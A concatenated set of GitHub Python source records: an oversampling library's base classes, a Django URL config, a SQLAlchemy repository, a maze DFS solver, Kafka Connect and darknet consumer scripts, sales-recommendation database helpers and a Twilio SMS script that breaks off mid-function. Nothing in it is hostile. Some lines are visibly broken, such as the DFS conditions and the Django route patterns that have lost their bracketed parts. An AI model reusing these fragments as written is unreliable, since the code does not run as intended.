'RandomSamplingMixin']\r\n\r\nclass RandomSamplingMixin(RandomStateMixin):\r\n \"\"\"\r\n This is the random sampling mixin class\r\n \"\"\"\r\n def __init__(self, random_state=None):\r\n \"\"\"\r\n Constructor of the mixin.\r\n\r\n Args:\r\n random_state (int/None/np.random.RandomState): initial random\r\n state\r\n \"\"\"\r\n RandomStateMixin.__init__(self, random_state)\r\n\r\n def get_params(self, deep=False):\r\n \"\"\"\r\n Return the parameter dictionary.\r\n\r\n Args:\r\n deep (bool): whether it should be a deep query\r\n\r\n Returns:\r\n dict: the parameter dictionary\r\n \"\"\"\r\n return RandomStateMixin.get_params(self, deep)\r\n\r\n def sample_between_points(self, x_vector, y_vector):\r\n \"\"\"\r\n Sample randomly along the line between two points.\r\n Args:\r\n x_vector (np.array): point 1\r\n y_vector (np.array): point 2\r\n Returns:\r\n np.array: the new sample\r\n \"\"\"\r\n return x_vector + (y_vector - x_vector)\\\r\n * self.random_state.random_sample()\r\n\r\n def sample_between_points_componentwise(self, x_vector, y_vector, mask=None):\r\n \"\"\"\r\n Sample each dimension separately between the two points.\r\n Args:\r\n x_vector (np.array): point 1\r\n y_vector (np.array): point 2\r\n mask (np.array): array of 0,1s - specifies which dimensions\r\n to sample\r\n Returns:\r\n np.array: the new sample being generated\r\n \"\"\"\r\n if mask is None:\r\n return x_vector + (y_vector - x_vector)*self.random_state.random_sample()\r\n\r\n return x_vector + (y_vector - x_vector)*self.random_state.random_sample()*mask\r\n\r\n def sample_by_jittering(self, x_vector, std):\r\n \"\"\"\r\n Sample by jittering.\r\n Args:\r\n x_vector (np.array): base point\r\n std (float): standard deviation\r\n Returns:\r\n np.array: the new sample\r\n \"\"\"\r\n return x_vector + (self.random_state.random_sample() - 0.5)*2.0*std\r\n\r\n def sample_by_jittering_componentwise(self, x_vector, std):\r\n \"\"\"\r\n Sample by jittering componentwise.\r\n Args:\r\n x_vector (np.array): base point\r\n std (np.array): standard deviation\r\n Returns:\r\n np.array: the new sample\r\n \"\"\"\r\n return x_vector + (self.random_state.random_sample(len(x_vector))-0.5)*2.0 * std\r\n\r\n def sample_by_gaussian_jittering(self, x_vector, std):\r\n \"\"\"\r\n Sample by Gaussian jittering\r\n Args:\r\n x_vector (np.array): base point\r\n std (np.array): standard deviation\r\n Returns:\r\n np.array: the new sample\r\n \"\"\"\r\n return self.random_state.normal(x_vector, std)\r\n\r\nclass OverSamplingBase(StatisticsMixin,\r\n ParametersMixin,\r\n MetricLearningMixin):\r\n \"\"\"\r\n Base class of oversampling methods\r\n \"\"\"\r\n\r\n categories = []\r\n\r\n cat_noise_removal = 'NR'\r\n cat_dim_reduction = 'DR'\r\n cat_uses_classifier = 'Clas'\r\n cat_sample_componentwise = 'SCmp'\r\n cat_sample_ordinary = 'SO'\r\n cat_sample_copy = 'SCpy'\r\n cat_memetic = 'M'\r\n cat_density_estimation = 'DE'\r\n cat_density_based = 'DB'\r\n cat_extensive = 'Ex'\r\n cat_changes_majority = 'CM'\r\n cat_uses_clustering = 'Clus'\r\n cat_borderline = 'BL'\r\n cat_application = 'A'\r\n cat_metric_learning = 'CD'\r\n\r\n def __init__(self, checks=None):\r\n \"\"\"\r\n Constructor of the base class.\r\n\r\n Args:\r\n checks (dict): the check list\r\n \"\"\"\r\n StatisticsMixin.__init__(self)\r\n ParametersMixin.__init__(self)\r\n MetricLearningMixin.__init__(self)\r\n checks_default = {'min_n_min': 2,\r\n 'check_np': True}\r\n self.checks = coalesce_dict(checks, checks_default)\r\n\r\n def det_n_to_sample(self, strategy, n_maj=None, n_min=None):\r\n \"\"\"\r\n Determines the number of samples to generate\r\n Args:\r\n strategy (str/float): if float, the fraction of the difference\r\n of the minority and majority numbers to\r\n generate, like 0.1 means that 10% of the\r\n difference will be generated if str,\r\n like 'min2maj', the minority class will\r\n be upsampled to match the cardinality\r\n of the majority class\r\n n_maj (int/None): the number of majority samples\r\n n_min (int/None): the number of minority samples\r\n\r\n Returns:\r\n int: the number of samples to generate\r\n \"\"\"\r\n if n_maj is None:\r\n n_maj = self.class_stats[self.maj_label]\r\n if n_min is None:\r\n n_min = self.class_stats[self.min_label]\r\n\r\n if isinstance(strategy, (int, float)):\r\n return max([0, int((n_maj - n_min)*strategy)])\r\n\r\n raise ValueError(f\"{self.__class__.__name__} Value {strategy} \"\\\r\n \"for parameter strategy is not supported\")\r\n\r\n def fit_resample(self, X, y):\r\n \"\"\"\r\n Alias of the function \"sample\" for compatibility with imbalanced-learn\r\n pipelines\r\n\r\n Args:\r\n X (np.array): the feature vectors\r\n y (np.array): the target labels\r\n\r\n Returns:\r\n np.array, np.array: the oversampled dataset\r\n \"\"\"\r\n return self.sample(X, y)\r\n\r\n def sampling_algorithm(self, X, y):\r\n \"\"\"\r\n The algorithm to be implemented.\r\n\r\n Args:\r\n X (np.array): features\r\n y (np.array): labels\r\n\r\n Returns:\r\n np.array, np.array: the oversampled dataset\r\n \"\"\"\r\n return X, y\r\n\r\n def sample(self, X, y):\r\n \"\"\"\r\n Sampling interface function.\r\n\r\n Args:\r\n X (np.array): features\r\n y (np.array): labels\r\n\r\n Returns:\r\n np.array, np.array: the oversampled dataset\r\n \"\"\"\r\n _logger.info(\"%s: Running sampling via %s\",\r\n self.__class__.__name__,\r\n self.descriptor())\r\n\r\n self.class_label_statistics(y)\r\n\r\n for key, item in self.checks.items():\r\n if key == 'min_n_min':\r\n if self.class_stats[self.min_label] <= item:\r\n msg = f\"{self.__class__.__name__}: Too few minority samples\"\\\r\n \" for sampling\"\r\n _logger.info(msg)\r\n return X.copy(), y.copy()\r\n if key == 'min_n_dim':\r\n if X.shape[1] < item:\r\n _logger.info(\"%s: not enough dimensions %d\",\r\n self.__class__.__name__, X.shape[1])\r\n return X.copy(), y.copy()\r\n\r\n return self.sampling_algorithm(X, y)\r\n\r\n def return_copies(self, X, y, msg):\r\n \"\"\"\r\n Returns copies of the data with logger message.\r\n\r\n Args:\r\n X (np.array): features\r\n y (np.array): labels\r\n msg (str): the logging message\r\n\r\n Returns:\r\n np.array, np.array: the oversampled dataset\r\n \"\"\"\r\n _logger.info(\"%s: returning copies for %s\",\r\n self.__class__.__name__, msg)\r\n\r\n if not suppress_internal_warnings():\r\n warnings.warn(f\"{self.__class__.__name__}: returning copies for {msg}\")\r\n\r\n return X.copy(), y.copy()\r\n\r\n def sample_with_timing(self, X, y):\r\n \"\"\"\r\n Execute the sampling with timing.\r\n\r\n Args:\r\n X (np.array): features\r\n y (np.array): labels\r\n msg (str): the logging message\r\n\r\n Returns:\r\n np.array, np.array: the oversampled dataset\r\n \"\"\"\r\n begin = time.time()\r\n\r\n X_samp, y_samp = self.sample(X, y)\r\n\r\n _logger.info(\"%s: runtime: %f\", self.__class__.__name__,\r\n (time.time() - begin))\r\n return X_samp, y_samp\r\n\r\n def preprocessing_transform(self, X):\r\n \"\"\"\r\n Transforms new data according to the possible transformation\r\n implemented by the function \"sample\".\r\n\r\n Args:\r\n X (np.array): features\r\n\r\n Returns:\r\n np.array: transformed features\r\n \"\"\"\r\n return X\r\n\r\n def get_params(self, deep=False):\r\n \"\"\"\r\n Returns the parameters of the object as a dictionary.\r\n\r\n Returns:\r\n dict: the parameters of the object\r\n \"\"\"\r\n _ = deep\r\n return {}\r\n\r\n def set_params(self, **params):\r\n \"\"\"\r\n Set parameters\r\n\r\n Args:\r\n params (dict): dictionary of parameters\r\n \"\"\"\r\n\r\n for key, value in params.items():\r\n setattr(self, key, value)\r\n\r\n return self\r\n\r\n def descriptor(self):\r\n \"\"\"\r\n The descriptor of the class\r\n\r\n Returns:\r\n str: JSON description of the current sampling object\r\n \"\"\"\r\n return str((self.__class__.__name__, str(self.get_params())))\r\n\r\n def __str__(self):\r\n \"\"\"\r\n The string representation\r\n\r\n Returns:\r\n str: the descriptor\r\n \"\"\"\r\n return self.descriptor()\r\n\r\n\r\nclass OverSampling(OverSamplingBase, RandomSamplingMixin):\r\n \"\"\"\r\n The oversampling base class.\r\n \"\"\"\r\n def __init__(self, random_state=None, checks=None):\r\n OverSamplingBase.__init__(self, checks)\r\n RandomSamplingMixin.__init__(self, random_state)\r\n\r\n def get_params(self, deep=False):\r\n return {**RandomSamplingMixin.get_params(self, deep),\r\n 'class_name': self.__class__.__name__}\r\n\r\n\r\nclass OverSamplingSimplex(OverSamplingBase, SimplexSamplingMixin):\r\n \"\"\"\r\n The oversampling simplex base class.\r\n \"\"\"\r\n def __init__(self,\r\n *,\r\n n_dim=2,\r\n simplex_sampling='random',\r\n within_simplex_sampling='random',\r\n gaussian_component=None,\r\n random_state=None,\r\n checks=None):\r\n OverSamplingBase.__init__(self, checks)\r\n\r\n if checks is not None and 'simplex_dim' in checks:\r\n if n_dim != checks['simplex_dim']:\r\n warnings.warn(f\"Simplex dimensions {n_dim} not supported \"\\\r\n f\"with the method {self.__class__.__name__} \"\\\r\n f\"forcing n_dim={checks['simplex_dim']}\")\r\n n_dim = checks['simplex_dim']\r\n\r\n SimplexSamplingMixin.__init__(self,\r\n n_dim=n_dim,\r\n simplex_sampling=simplex_sampling,\r\n within_simplex_sampling=within_simplex_sampling,\r\n gaussian_component=gaussian_component,\r\n random_state=random_state)\r\n\r\n def get_params(self, deep=False):\r\n return {**SimplexSamplingMixin.get_params(self, deep),\r\n 'class_name': self.__class__.__name__}\r\n","repo_name":"analyticalmindsltd/smote_variants","sub_path":"smote_variants/base/_oversampling.py","file_name":"_oversampling.py","file_ext":"py","file_size_in_byte":11924,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"37"} +{"seq_id":"1924461859","text":"import nltk\nimport re\nfrom nltk.corpus import stopwords\nimport gensim\nfrom gensim.parsing.preprocessing import STOPWORDS\nfrom nltk.corpus import stopwords\nstop_words = stopwords.words('english')\nstop_words.extend('\\n')\nimport string\n\n\ndef preprocessing_pipeline(text):\n text_1 = []\n for char in text:\n if char not in string.punctuation:\n text_1.append(char)\n cleaned_text = \"\".join(text_1)\n text_list = []\n text = str(cleaned_text)\n text_without_urls = re.sub(r'http\\S+|www.\\S+', '', cleaned_text)\n text_list.append(text_without_urls)\n results = []\n tokens = gensim.utils.simple_preprocess(cleaned_text)\n for token in tokens:\n if len(token) >= 3 and token not in stop_words:\n results.append(token)\n cleaned_text = \" \".join(results)\n return cleaned_text \n \n","repo_name":"amanshah22073/Spam-Ham-Classifier-App","sub_path":"preprocessing_pipeline.py","file_name":"preprocessing_pipeline.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29473596515","text":"from django.urls import path,include\nfrom rest_framework import routers\nfrom .views import (\n home,\n BookListView,\n BookDetailView,\n AuthorListView,\n AuthorDetailView,\n LoanedBooksByUserListView,\n LoanedBooksListView,\n renew_book_librarian,\n AuthorCreateView,\n AuthorUpdate,\n AuthorDelete,\n BookCreateView,\n BookUpdate,\n BookDelete,\n BlogDetailView,\n about,\n dashboard,\n profile,\n # form,\n BlogCreateView,\n BookInstanceCreateView,\n signUpView,\n \n \n)\nurlpatterns = [\n path('author/create/', AuthorCreateView.as_view(), name='author-create'),\n path('user/register/', signUpView, name='register'),\n path('book/create/', BookCreateView.as_view(), name='book-create'),\n path('blog/create/', BlogCreateView.as_view(), name='blog-create'),\n path('',home,name=\"catalog\"),\n path('dashboard/',dashboard,name=\"dashboard\"),\n path('profile/',profile,name=\"profile\"),\n path('book/loan/', BookInstanceCreateView, name='loan-book'),\n path('about/',about,name=\"about\"),\n # path('form/',form,name=\"form\"),\n path('blog//',BlogDetailView.as_view(),name=\"blog\"),\n path('book/list/',BookListView.as_view(),name=\"books\"),\n path('mybooks/',LoanedBooksByUserListView.as_view(), name='my-borrowed'),\n path('book//',BookDetailView.as_view(),name=\"book\"),\n path('author/list/',AuthorListView.as_view(),name=\"authors\"),\n path('books/borrowed/',LoanedBooksListView.as_view(), name='all-borrowed'),\n path('book//renew/', renew_book_librarian, name='renew-book-librarian'),\n path('book//update/', BookUpdate.as_view(), name='book-update'),\n path('book//delete/',BookDelete.as_view(), name='book-delete'),\n path('author//',AuthorDetailView.as_view(),name=\"author\"),\n path('author//update/', AuthorUpdate.as_view(), name='author-update'),\n path('author//delete/',AuthorDelete.as_view(), name='author-delete'),\n]\n","repo_name":"belhazzh5/library-dash","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25926713248","text":"from typing import List, Optional, Sequence\nfrom sqlalchemy import delete, select, update\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.orm import joinedload\n\nfrom src.models.v1.users import Member, Role\n\n\nclass RoleRepository:\n def __init__(self, session: AsyncSession):\n self.session = session\n\n async def add(self, member_role: Role) -> Role:\n self.session.add(member_role)\n await self.session.commit()\n return member_role\n\n async def get_all(self) -> Sequence[Role]:\n result = await self.session.execute(select(Role))\n return result.scalars().all()\n\n async def filter_by_member(self, member_id: str) -> Optional[List[Role]]:\n member = await (\n self.session.execute(select(Member).filter_by(id=member_id))\n )\n member = member.scalars().first()\n\n await self.session.refresh(member, ['roles'])\n\n return member.roles if member else None\n\n async def get_by_id(self, role_id: str) -> Role | None:\n query = await (\n self.session.execute(select(Role).where(Role.id == role_id))\n )\n role = query.scalars().first()\n\n return role\n\n async def get_by_name(self, role_name: str) -> Role | None:\n query = await (\n self.session.execute(select(Role).filter_by(name=role_name))\n )\n return query.scalars().first()\n\n async def get_by_name_with_permissions(\n self, role_name: str) -> Role | None:\n result = await self.session.execute(\n select(Role)\n .options(joinedload(Role.permissions))\n .filter_by(name=role_name)\n )\n\n return result.unique().scalar_one_or_none()\n\n async def update(self, role_id: str, role_data: dict) -> Role:\n query = (\n update(Role).\n where(Role.id == role_id).\n values(**role_data).\n returning(Role)\n )\n result = await self.session.execute(query)\n await self.session.commit()\n return result.scalar_one()\n\n async def delete(self, role_id: str) -> None:\n query = delete(Role).where(Role.id == role_id)\n await self.session.execute(query)\n await self.session.commit()\n","repo_name":"jutsuteck/devjutsu","sub_path":"jutsu-services/auth-service/src/repositories/role_repository.py","file_name":"role_repository.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27994478591","text":"from cryptocoins.coins.trx.utils import is_valid_tron_address, get_latest_tron_block_num\nfrom cryptocoins.coins.trx.wallet import trx_wallet_creation_wrapper\nfrom cryptocoins.utils.register import register_coin\n\nTRX = 7\nCODE = 'TRX'\nDECIMALS = 2\n\nTRX_CURRENCY = register_coin(\n currency_id=TRX,\n currency_code=CODE,\n address_validation_fn=is_valid_tron_address,\n wallet_creation_fn=trx_wallet_creation_wrapper,\n latest_block_fn=get_latest_tron_block_num,\n blocks_diff_alert=100,\n)\n","repo_name":"Polygant/OpenCEX-backend","sub_path":"cryptocoins/coins/trx/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"13924923167","text":"import numpy as np\n\ndef DFS_Find_Path(row, col, maze):\n visited = np.zeros((row, col)) # mark the visited cells\n visited[0][0] = 1\n path = [[0,0]]\n choice_ind = [] # save the index (from path) of more than one choice pos\n choices = [] # save the choices of more than one choice pos\n cur = [0,0] # start from [0,0]\n visited_cells = 1\n while cur != [row-1, col-1]:\n # check neighbor\n neighbor = []\n # condition: not edge, not wall, not previous pos\n if cur[0]0 and maze[3*cur[0], 3*cur[1]+1]==0.5 and visited[cur[0]-1, cur[1]]==0: # up\n neighbor.append([cur[0]-1, cur[1]])\n visited[cur[0]-1, cur[1]] = 1\n visited_cells += 1\n if cur[1]>0 and maze[3*cur[0]+1, 3*cur[1]]==0.5 and visited[cur[0], cur[1]-1]==0: # left\n neighbor.append([cur[0], cur[1]-1])\n visited[cur[0], cur[1]-1] = 1\n visited_cells += 1\n # chose next pos\n if len(neighbor) == 1: # only one choice\n cur = [neighbor[0][0], neighbor[0][1]]\n path.append(cur)\n elif len(neighbor) == 0: # no choice, go to latest more than one choices pos\n cur = choices[-1][0]\n path = path[:choice_ind[-1]]\n path.append(cur)\n visited_cells += 1\n if len(choices[-1]) == 1: # run out of choice, remove from the saving list\n choice_ind = choice_ind[:-1]\n choices = choices[:-1]\n else:\n choices[-1] = choices[-1][1:] # choice - 1\n else: # more than one choice, save it\n cur = [neighbor[0][0], neighbor[0][1]]\n path.append(cur)\n choice_ind.append(len(path)-1)\n choices.append(neighbor[1:])\n return path, visited_cells\n\n\n\n","repo_name":"Weiwei-Wan/AI-navigate-Maze-with-UI","sub_path":"DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"22980434099","text":"import asyncio\nimport json\nfrom confluent_kafka import Producer , Consumer\nfrom dataclasses import dataclass, field\nimport json , random\n\nBROKER_URL = \"localhost:9092\"\n\nimport requests\n\nKAFKA_CONNECT_URL = \"http://localhost:8083/connectors\"\nCONNECTOR_NAME = \"user-info\"\n\n\ndef configure_connector():\n \"\"\"Calls Kafka Connect to create the Connector\"\"\"\n print(\"creating or updating kafka connect connector...\")\n\n rest_method = requests.post\n resp = requests.get(f\"{KAFKA_CONNECT_URL}/{CONNECTOR_NAME}\")\n if resp.status_code == 200:\n return\n\n #\n # TODO: Complete the Kafka Connect Config below.\n # See: https://docs.confluent.io/current/connect/references/restapi.html\n # See: https://docs.confluent.io/current/connect/filestream_connector.html#filesource-connector\n #\n resp = rest_method(\n KAFKA_CONNECT_URL,\n headers={\"Content-Type\": \"application/json\"},\n data=json.dumps(\n {\n \"name\": \"clicks-jdbc\", # TODO\n \"config\": {\n \"connector.class\": \"io.confluent.connect.jdbc.JdbcSourceConnector\", # TODO\n \"topic.prefix\": CONNECTOR_NAME, # TODO\n \"mode\": \"incrementing\", # TODO\n \"incrementing.column.name\": \"id\", # TODO\n \"table.whitelist\": \"user_info\", # TODO\n \"tasks.max\": 1,\n \"connection.url\": \"jdbc:postgresql://localhost:5432/docker\",\n \"connection.user\": \"postgres\",\n \"key.converter\": \"org.apache.kafka.connect.json.JsonConverter\",\n \"key.converter.schemas.enable\": \"false\",\n \"value.converter\": \"org.apache.kafka.connect.json.JsonConverter\",\n \"value.converter.schemas.enable\": \"false\",\n },\n \n },\n \n ),\n )\n\n # Ensure a healthy response was given\n # Ensure a healthy response was given\n try:\n resp.raise_for_status()\n except:\n print(f\"failed creating connector: {json.dumps(resp.json(), indent=2)}\")\n exit(1)\n print(\"connector created successfully.\")\n print(\"Use kafka-console-consumer and kafka-topics to see data!\")\n\n\nasync def consume():\n c = Consumer(\n {\n \"bootstrap.servers\": BROKER_URL, \n \"group.id\": \"0\",\n \"auto.offset.reset\": \"earliest\",\n }\n\n )\n c.subscribe([CONNECTOR_NAME])\n while True:\n #\n # TODO: Write a loop that uses consume to grab 5 messages at a time and has a timeout.\n # See: https://docs.confluent.io/current/clients/confluent-kafka-python/index.html?highlight=partition#confluent_kafka.Consumer.consume\n #\n messages = c.consume(5, timeout=1.0)\n # TODO: Print something to indicate how many messages you've consumed. Print the key and value of\n # any message(s) you consumed\n print(f\"consumed {len(messages)} messages\")\n for message in messages:\n print(f\"consume message {message.key()}: {message.value()}\")\n\n # Do not delete this!\n await asyncio.sleep(0.01)\n\n\nasync def log_task():\n \"\"\"Runs the log task\"\"\"\n consumer = asyncio.create_task(consume())\n configure_connector()\n await consumer\n\n\ndef run():\n \"\"\"Runs the simulation\"\"\"\n try:\n asyncio.run(log_task())\n except KeyboardInterrupt as e:\n print(\"shutting down\")\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"ahmed-hassan97/Udacity-Data-streaming-Nanodegree","sub_path":"Kafka Connect JDBC Source/Kafka_Connect_JDBC_Source.py","file_name":"Kafka_Connect_JDBC_Source.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20245645666","text":"# Test of consumering process\n\n\nimport sys,pickle,pika,time\nimport darknet\nimport mysql.connector\nconfig = {\n 'user': '****',\n 'password': '****',\n# 'host': '127.0.0.1', #localhost\n 'host':'host.docker.internal',\n 'database': 'test',\n 'raise_on_warnings': True\n}\ncnx = mysql.connector.connect(**config)\ncur = cnx.cursor()\nnet = darknet.load_net(b\"/opt/numpydarknet_gpu/cfg/yolov3.cfg\", b\"/opt/numpydarknet_gpu/yolov3.weights\", 0)\nmeta = darknet.load_meta(b\"/opt/numpydarknet_gpu/cfg/coco.data\")\n\ndef callback(ch, method, properties, body):\n mdata = pickle.loads(body)\n print('working on count:',mdata['count'])\n #time.sleep(20)\n\n result=darknet.detect_np(net, meta, mdata['buff'])\n print(mdata['count'],result)\n dic={'bear':0, 'zebra':0}\n for ob in result:\n ani=ob[0].decode()\n if ani in dic and dic[ani]= threshold:\n sqlQuery = \"INSERT INTO %s VALUES (%d, %d, %.2f)\" % (tableName, i, j, salesMatrixEst[i,j])\n cur.execute(sqlQuery)\n\n conn.commit()\n conn.close()\n \ndef updateRecommendations(db_name, criteria):\n salesMatrixEst = generateRecommendations(db_name, criteria)\n updateSalesEstimationTable(db_name, criteria, salesMatrixEst)\n \ndef updateRecommendationsWithThreshold(db_name, criteria, threshold):\n salesMatrixEst = generateRecommendations(db_name, criteria)\n updateSalesEstimationTableWithThreshold(db_name, criteria, salesMatrixEst, threshold)\n \n \ndef updateMarginalSalesTensor(db_name, desiredFields):\n conn = sqlite3.connect(db_name)\n cur = conn.cursor()\n\n tableName = \"MarginalSalesTensor_%s%s%s\" % (desiredFields[0][:-5], desiredFields[1][:-5], desiredFields[2][:-5])\n\n sqlQuery = \"DROP TABLE IF EXISTS %s\" % tableName\n cur.execute(sqlQuery)\n\n sqlQuery = \"CREATE TABLE %s (%s INT, %s INT, %s INT, Amount REAL)\" % (tableName, desiredFields[0], desiredFields[1], desiredFields[2])\n cur.execute(sqlQuery)\n\n temp = \"%s, %s, %s\" % (desiredFields[0], desiredFields[1], desiredFields[2])\n sqlQuery = \"SELECT \" + temp + \", SUM(Amount) FROM SalesTensor GROUP BY \" + temp \n cur.execute(sqlQuery)\n\n col0 = []\n col1 = []\n col2 = []\n data = []\n\n for values in cur:\n col0.append(values[0])\n col1.append(values[1])\n col2.append(values[2])\n data.append(values[3])\n\n for i in range(len(data)):\n sqlQuery = \"INSERT INTO %s VALUES (%d, %d, %d, %.2f)\" % (tableName, col0[i], col1[i], col2[i], data[i])\n cur.execute(sqlQuery) \n\n conn.commit()\n conn.close()\n \ndef updateAllMarginalSalesTensors(db_name):\n desiredFields = [\"CustomerIndex\", \"WeekIndex\", \"DowIndex\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n\n desiredFields = [\"CustomerIndex\", \"WeekIndex\", \"HourIndex\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n\n #desiredFields = [\"CustomerIndex\", \"WeekIndex\", \"ItemIndex\"]\n #updateMarginalSalesTensor(db_name, desiredFields)\n\n desiredFields = [\"CustomerIndex\", \"WeekIndex\", \"ItemG3Index\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n\n desiredFields = [\"CustomerIndex\", \"DowIndex\", \"HourIndex\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n\n desiredFields = [\"CustomerIndex\", \"DowIndex\", \"ItemG3Index\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n\n desiredFields = [\"CustomerIndex\", \"HourIndex\", \"ItemG3Index\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n \n \ndef updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, numCustomers):\n dataDict = {}\n for idx in range(numCustomers): \n customerIndex = idx\n salesMatrix = SalesFunctions.getSalesMatrixOfCustomer(db_name, customerIndex, desiredFields, \"sum\", desiredShapes)\n\n dataDict.update({str(idx):salesMatrix})\n\n filename = 'database/MarginalSalesTensor_Customer%s%s.mat' % (desiredFields[0][:-5], desiredFields[1][:-5]) \n sio.savemat(filename, dataDict)\n \n\ndef updateAllMarginalSalesTensorMat(db_name):\n dimensions = [\"WeekIndex\", \"DowIndex\", \"HourIndex\", \"ItemG3Index\"]\n DATABASE_SHAPE = DatabaseInfoFunctions.getDatabaseShape(db_name)\n shapes = [DATABASE_SHAPE[0], DATABASE_SHAPE[1], DATABASE_SHAPE[2], DATABASE_SHAPE[4]] \n\n desiredFields = [\"WeekIndex\", \"DowIndex\"]\n desiredShapes = [DATABASE_SHAPE[0], DATABASE_SHAPE[1]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n\n desiredFields = [\"WeekIndex\", \"HourIndex\"]\n desiredShapes = [DATABASE_SHAPE[0], DATABASE_SHAPE[2]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n \n desiredFields = [\"WeekIndex\", \"ItemG3Index\"]\n desiredShapes = [DATABASE_SHAPE[0], DATABASE_SHAPE[4]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n \n desiredFields = [\"DowIndex\", \"HourIndex\"]\n desiredShapes = [DATABASE_SHAPE[1], DATABASE_SHAPE[2]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n \n desiredFields = [\"DowIndex\", \"ItemG3Index\"]\n desiredShapes = [DATABASE_SHAPE[1], DATABASE_SHAPE[4]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n \n desiredFields = [\"HourIndex\", \"ItemG3Index\"]\n desiredShapes = [DATABASE_SHAPE[2], DATABASE_SHAPE[4]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n ","repo_name":"koptagel/obaseV2","sub_path":"OfflineFunctions.py","file_name":"OfflineFunctions.py","file_ext":"py","file_size_in_byte":7811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6139048946","text":"#! python3\n\n\"\"\"\nSimple module that uses Twilio to send SMS messages to yourself. This module was\ninspired by Al Sweigart's \"Automate the Boring Stuff\" (Project: “Just Text Me”\nModule in Chapter 16).\n\nPossible areas for future development:\n\n - Support SMS messages with media (e.g. images).\n - Allow usage beyond restrictions of Twilio free account\n (e.g. send to/from multiple phone numbers).\n\"\"\"\n\n# std\nimport argparse\nfrom configparser import ConfigParser\nimport logging\nimport os\n\n# 3rd party\nimport backoff\nfrom twilio.rest import Client\n\n# logging\nLOG_FILEPATH = os.path.expanduser('~') + '/dev/logs.txt'\nlogging.basicConfig(filename=LOG_FILEPATH, level=logging.INFO)\nLOGGER = logging.getLogger('text_myself')\n\n# global constants\nCONFIG_FILEPATH = os.path.expanduser('~') + '/dev/py_config.ini'\n\ndef get_sms_credentials(config_filepath=None):\n '''\n Fetches Twilio credentials from a Config .ini file stored locally.\n\n Args:\n config_filepath: String that is the full path on the local machine\n to a .ini file (in the style of ConfigParser) that contains\n Twilio API credentials.\n\n Returns:\n credentials: Dictionary containing the `ACCOUNT_SID` and `AUTH_TOKEN`\n for the Twilio API.\n '''\n if not config_filepath:\n config_filepath = CONFIG_FILEPATH\n if not os.path.exists(CONFIG_FILEPATH):\n raise ValueError('Path provided for config file does not exist')\n\n config = ConfigParser()\n config.read(config_filepath)\n credentials = {}\n try:\n credentials['ACCOUNT_SID'] = config['Twilio']['ACCOUNT_SID']\n credentials['AUTH_TOKEN'] = config['Twilio']['AUTH_TOKEN']\n credentials['FROM_PHONE_NUMBER'] = config['Twilio']['FROM_PHONE_NUMBER']\n credentials['TO_PHONE_NUMBER'] = config['General']['MY_PHONE_NUMBER']\n except Exception as e:\n print(config_filepath)\n print('An exception occurred when reading config file: %s' % e)\n\n return credentials\n\ndef send_sms_message(client=None, from_phone_number=None, to_phone_number=None,\n message=None):\n '''\n Sends a simple, text-only SMS message using the Twilio REST client.\n\n Args:\n message: String up to 1.6k in length. This is the message that will be\n sent via SMS.\n credentials: Dict containing keys `ACCOUNT_SID` and `AUTH_TOKEN` that\n are associated with an active Twilio user.\n\n Returns:\n sms_message: Twilio SMS messsage object. This can be used to track\n delivery status of the message.\n '''\n if not client:\n raise ValueError('No API client found.')\n if not from_phone_number:\n raise ValueError('No from-phone-number found.')\n if not to_phone_number:\n raise ValueError('No to-phone-number found.')\n if not message:\n raise ValueError('No message found.')\n\n sms_message = None\n try:\n sms_message = client.messages.create(\n to=to_phone_number,\n body=message,\n from_=from_phone_number)\n except Exception as e:\n LOGGER.warning('There was a problem when sending SMS message: %s', e)\n\n return sms_message\n\n@backoff.on_predicate(backoff.fibo, lambda status: status != 'delivered', max_value=13)\ndef confirm_sms_delivery(client, sms_message=None):\n '''\n Fetches current SMS message status value from the Twilio REST API\n\n Args:\n - sms_message: Twilio SMS object.\n\n Returns:\n - status: String that confirms final delivery of the SMS message.\n '''\n status = None\n if sms_message is not None:\n sms_message_updated = client.messages.get(sms_message.sid).fetch()\n status = sms_message_updated.status\n\n return status\n\ndef run(message=None):\n '''\n Run method for module.\n\n Args:\n message: String. It is possible to run this method via another script\n by importing as a module.\n -m or --message: Optional CLI arguments can also be passed to use this\n script in a stand-alone fashion.\n '''\n if not message:\n args = argparse.ArgumentParser()\n args.add_argument('-m', '--message', dest='message', required=False,\n nargs='*', help='Enter the message that you want to \\\nhave sent. Up to 1.6k characters is supported.')\n message = ' '.join(args.parse_args().message)\n\n try:\n credentials = 